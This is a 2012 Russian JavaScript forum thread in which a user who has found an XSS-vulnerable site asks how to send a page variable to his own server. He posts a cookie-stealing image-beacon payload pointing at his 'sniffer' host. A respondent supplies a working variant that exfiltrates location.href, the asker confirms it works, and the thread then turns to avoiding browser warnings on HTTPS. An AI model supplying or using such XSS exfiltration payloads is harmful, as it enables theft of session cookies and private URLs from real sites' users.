Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 04.01.2012, 22:06
Интересующийся
Отправить личное сообщение для nicklan Посмотреть профиль Найти все сообщения от nicklan
 
Регистрация: 26.08.2011
Сообщений: 14

Как передать переменную на другой сервер?
Есть уязвимый к XSS сайт.
Как сделать так, чтоб я узнал переменную needed?
var needed=window.location.href;

Я так понял, нужно как-то отправить её на мой сервер? Только как это сделать?





P.S. Возможно у вас будет вопрос, зачем мне такое делать, если можно сделать так:
img = new Image(); img.src = "http://мойхост.com/sniffer/img.gif?"+document.cookie;

и узнать HTTP Referrer. Но сайт на HTTPS и я не узнаю HTTP Referrer.

Последний раз редактировалось nicklan, 04.01.2012 в 22:10.
Ответить с цитированием
  #2 (permalink)  
Старый 04.01.2012, 23:32
Профессор
Посмотреть профиль Найти все сообщения от Livaanderiamarum
 
Регистрация: 25.12.2011
Сообщений: 786

никак
Ответить с цитированием
  #3 (permalink)  
Старый 04.01.2012, 23:38
Интересующийся
Отправить личное сообщение для nicklan Посмотреть профиль Найти все сообщения от nicklan
 
Регистрация: 26.08.2011
Сообщений: 14

Тоесть эту переменную никак нельзя передать на какой-то сервер??
хм.. может что-то путаете?
Ответить с цитированием
  #4 (permalink)  
Старый 04.01.2012, 23:57
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

раз можете сделать так
Сообщение от nicklan
img = new Image(); img.src = "http://мойхост.com/sniffer/img.gif?"+document.cookie;
то в чем проблема адрес отправить
img = new Image(); img.src = "http://мойхост.com/sniffer/img.gif?"+encodeURIComponent(location.href);

?

Только браузер выдаст предупреждение.
Ответить с цитированием
  #5 (permalink)  
Старый 05.01.2012, 00:11
Интересующийся
Отправить личное сообщение для nicklan Посмотреть профиль Найти все сообщения от nicklan
 
Регистрация: 26.08.2011
Сообщений: 14

Ух! Огроменное спасибо! работает!! Просто мои знания в js небольшие, незнал что так можно!) ещё раз спасибо!

Предупреждение он выдаст в любом случае, если даже в конце будет стоять +document.cookie. Чтобы предупреждения не было нужно иметь сервер с https?

Последний раз редактировалось nicklan, 05.01.2012 в 00:14.
Ответить с цитированием
  #6 (permalink)  
Старый 05.01.2012, 02:28
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

даже если будет сервер с https, домен то все равно будет другой, поэтому от предупреждения никак не избавиться, браузер предупредит о любых загрузках со сторонних источников на https-странице
Ответить с цитированием
  #7 (permalink)  
Старый 05.01.2012, 10:17
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Сообщение от Octane
даже если будет сервер с https, домен то все равно будет другой, поэтому от предупреждения никак не избавиться
На сторонний https сервер предупреждения не будет, иначе все https сайты с той же Яндекс.Метрикой выдавали бы предупреждения.

Последний раз редактировалось Kolyaj, 05.01.2012 в 10:20.
Ответить с цитированием
  #8 (permalink)  
Старый 05.01.2012, 16:17
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

черт… никогда не буду нажимать "показать картинки" в gmail
Ответить с цитированием
  #9 (permalink)  
Старый 05.01.2012, 16:26
Профессор
Посмотреть профиль Найти все сообщения от Livaanderiamarum
 
Регистрация: 25.12.2011
Сообщений: 786

Сообщение от Octane Посмотреть сообщение
черт… никогда не буду нажимать "показать картинки" в gmail
думаешь gmail скрипты поддерживает? нет, вопрос не риторический, я хочу узнать думаешь ли ты так?
Ответить с цитированием
  #10 (permalink)  
Старый 05.01.2012, 16:28
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

зачем скрипт для показа картинки?
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как передать переменную по ссылке на другую страницу сайта. Alekc Общие вопросы Javascript 6 01.12.2010 21:32
Как сделать локальную переменную глобальной?? Дмитрий Общие вопросы Javascript 8 02.11.2010 03:33
Как передать значение по ссылке на другую страницу сайта Rollo Общие вопросы Javascript 7 18.10.2010 15:02
Как обозначить переменную выбранную в FileChooser? woo_hoo Общие вопросы Javascript 4 03.07.2008 12:58
Как передать элемент в функцию после createElement Oleg NT Общие вопросы Javascript 3 23.06.2008 02:11